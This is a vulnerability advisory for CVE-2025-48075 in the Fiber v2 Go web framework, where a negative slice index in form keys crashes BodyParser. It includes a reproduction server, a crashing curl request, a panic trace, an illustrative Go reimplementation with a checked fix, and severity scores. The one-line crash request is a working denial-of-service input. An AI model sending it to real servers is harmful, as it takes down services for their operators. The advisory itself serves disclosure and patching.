CVE-2025-48075

ADVISORY - github

Summary

When fiber.Ctx.BodyParser is used to parse form data into a struct that contains a slice field, the server panics as soon as a request names a negative slice index.

Details

fiber.Ctx.BodyParser can map flat form keys onto nested slices using key[idx].field syntax (for example nested-content[0].value, as in the reproduction below). When idx is negative, the decoder panics instead of returning an error stating that it cannot process the data.

Since the keys are user-provided, any client that can reach an endpoint that feeds such a struct to fiber.Ctx.BodyParser can trigger the panic, which is a denial of service.

Reproducing

Take a simple Fiber v2 server that returns a JSON-encoded version of the parsed form data:

package main

import (
    "encoding/json"
    "fmt"
    "net/http"

    "github.com/gofiber/fiber/v2"
)

// RequestBody is the decode target: form keys of the shape
// nested-content[<idx>].value map onto NestedContent[<idx>].Value.
type RequestBody struct {
    NestedContent []*struct {
        Value string `form:"value"`
    } `form:"nested-content"`
}

func main() {
    app := fiber.New()

    app.Post("/", func(c *fiber.Ctx) error {
        formData := RequestBody{}
        // BodyParser decodes the form into formData. A negative slice
        // index in a key panics inside this call instead of returning err.
        if err := c.BodyParser(&formData); err != nil {
            fmt.Println(err)
            return c.SendStatus(http.StatusUnprocessableEntity)
        }
        c.Set("Content-Type", "application/json")
        s, _ := json.Marshal(formData)
        return c.SendString(string(s))
    })

    fmt.Println(app.Listen(":3000"))
}

Correct behaviour

Send a valid request such as:

curl --location 'localhost:3000' \
--form 'nested-content[0].value="Foo"' \
--form 'nested-content[1].value="Bar"'

You receive valid JSON:

{"NestedContent":[{"Value":"Foo"},{"Value":"Bar"}]}

Crashing behaviour

Send an invalid request such as:

curl --location 'localhost:3000' \
--form 'nested-content[-1].value="Foo"'

The server panics and the process exits:

panic: reflect: slice index out of range

goroutine 8 [running]:
reflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?)
        /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167
github.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...})
[...]
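The following stand-alone Go program is an added illustration, not code from the Fiber project or from the advisory. It reimplements the flat-key-to-nested-slice mapping described under Details with the reflect package, once in an unchecked form that reproduces the bug class (the parsed index goes straight to reflect.Value.Index, which panics for a negative value with the same message seen in the trace above) and once in a checked form that validates the index before any reflect call. The names decode, tryDecode, fieldByTag, maxIndex and ErrBadIndex are this example's own, and the input maps are constructed to match the two curl requests. It goes slightly beyond the page by also capping the positive index, because an unbounded index lets a client force a large allocation; that cap is an assumption of this example, not a Fiber setting.

```go
package main

import (
	"errors"
	"fmt"
	"reflect"
	"regexp"
	"strconv"
)

// keyRE matches the flat key syntax from the curl examples, e.g.
// "nested-content[0].value": group 1 = slice name, 2 = index, 3 = field.
var keyRE = regexp.MustCompile(`^([^\[\]]+)\[(-?\d+)\]\.([^.\[\]]+)$`)

// maxIndex bounds how far a client may grow a slice (assumption of this
// example, not a Fiber setting): without it "x[999999999].v" is a memory DoS.
const maxIndex = 1024

// ErrBadIndex is what the hardened path returns instead of panicking.
var ErrBadIndex = errors.New("form: slice index out of range")

// Item and Form mirror the struct shapes used in the reproduction above.
type Item struct {
	Value string `form:"value"`
}

type Form struct {
	NestedContent []*Item `form:"nested-content"`
}

// decode maps flat key/value pairs into dst, a pointer to a struct whose
// slice fields carry `form` tags. With checked=false it reproduces the bug
// class: a negative index reaches reflect.Value.Index, which panics.
func decode(dst interface{}, fields map[string]string, checked bool) error {
	v := reflect.ValueOf(dst).Elem()
	t := v.Type()
	for key, val := range fields {
		m := keyRE.FindStringSubmatch(key)
		if m == nil {
			return fmt.Errorf("form: unsupported key %q", key)
		}
		name, idxStr, field := m[1], m[2], m[3]
		idx, err := strconv.Atoi(idxStr)
		if err != nil {
			return fmt.Errorf("form: bad index in %q: %w", key, err)
		}
		// Hardened path: reject sign and bound before touching reflect.
		if checked && (idx < 0 || idx > maxIndex) {
			return fmt.Errorf("%w: %d in %q", ErrBadIndex, idx, key)
		}
		slice := fieldByTag(v, t, name)
		if !slice.IsValid() || slice.Kind() != reflect.Slice {
			return fmt.Errorf("form: no slice field tagged %q", name)
		}
		// Grow the slice so that idx is addressable ...
		if idx >= slice.Len() {
			grown := reflect.MakeSlice(slice.Type(), idx+1, idx+1)
			reflect.Copy(grown, slice)
			slice.Set(grown)
		}
		// ... then index it. For idx < 0 the unchecked path panics here
		// with "reflect: slice index out of range", as in the advisory trace.
		elem := slice.Index(idx)
		if elem.IsNil() {
			elem.Set(reflect.New(slice.Type().Elem().Elem()))
		}
		target := fieldByTag(elem.Elem(), elem.Elem().Type(), field)
		if !target.IsValid() || target.Kind() != reflect.String {
			return fmt.Errorf("form: no string field tagged %q", field)
		}
		target.SetString(val)
	}
	return nil
}

// fieldByTag returns the field of struct v whose `form` tag equals name.
func fieldByTag(v reflect.Value, t reflect.Type, name string) reflect.Value {
	for i := 0; i < t.NumField(); i++ {
		if t.Field(i).Tag.Get("form") == name {
			return v.Field(i)
		}
	}
	return reflect.Value{}
}

// tryDecode runs decode and turns a panic into a reported error so the
// crash can be observed without taking the process down.
func tryDecode(fields map[string]string, checked bool) (form Form, panicked bool, err error) {
	defer func() {
		if r := recover(); r != nil {
			panicked = true
			err = fmt.Errorf("panic: %v", r)
		}
	}()
	err = decode(&form, fields, checked)
	return
}

func main() {
	// Constructed inputs matching the page's two curl requests.
	good := map[string]string{"nested-content[0].value": "Foo", "nested-content[1].value": "Bar"}
	bad := map[string]string{"nested-content[-1].value": "Foo"}

	f, _, err := tryDecode(good, false)
	fmt.Println(f.NestedContent[0].Value, f.NestedContent[1].Value, err)
	_, panicked, err := tryDecode(bad, false)
	fmt.Println("unchecked:", panicked, err)
	_, panicked, err = tryDecode(bad, true)
	fmt.Println("checked:", panicked, err)
}
```

Run it with go run: the unchecked path reports the same "reflect: slice index out of range" panic as the trace, caught only because tryDecode wraps the call in recover. The fix pattern is the checked branch: validate the parsed index, both sign and an upper bound, before it reaches reflect.MakeSlice or reflect.Value.Index, and return an ordinary error so the handler can answer 422 instead of the process dying.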

Impact

Any server that calls fiber.Ctx.BodyParser on a struct with a slice field can be crashed by a single request carrying a negative index, such as nested-content[-1].value, from any client able to reach the endpoint. Fiber does not recover handler panics unless the recover middleware (github.com/gofiber/fiber/v2/middleware/recover) is explicitly installed, so without it the whole process exits.

EPSS Score: 0.00081 (0.245)

Common Weakness Enumeration (CWE)

ADVISORY - nist

Improper Validation of Array Index (CWE-129)

ADVISORY - github

Improper Validation of Array Index (CWE-129)

ADVISORY - gitlab

OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Improper Validation of Array Index (CWE-129)

OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities


Scores by source

Source       Advisory ID          CWE       Exploitability  Exploits found  CVSS score
NIST         -                    CWE-129   3.9             -               7.7 (high)
GitHub       -                    CWE-129   -               -               7.7 (high)
GoLang       GO-2025-3706         -         -               -               rating unavailable from advisory
GitLab       CVE-2025-48075       CWE-129   -               -               N/A (unspecified)
Chainguard   CGA-5p55-h7qf-gjjc   -         -               -               rating unavailable from advisory